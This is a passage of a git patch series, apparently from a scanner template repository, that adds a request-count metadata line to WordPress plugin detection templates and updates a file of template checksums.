https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..017cf76f11 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-seopress/ metadata: + max-request: 1 plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 27f6d46c2b..bc83478f06 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 9cbcb77b2690659b268d8ecaa4d6c8cb03ed36c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Sep 2023 13:28:29 +0000 Subject: [PATCH 22/23] Auto Generated Templates Checksum [Wed Sep 27 13:28:29 UTC 2023] :robot: --- templates-checksum.txt | 592 ++++++++++++++++++++--------------------- 1 file changed, 296 insertions(+), 296 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0bbbd267de..d83c5aa6d8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5861,218 +5861,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2 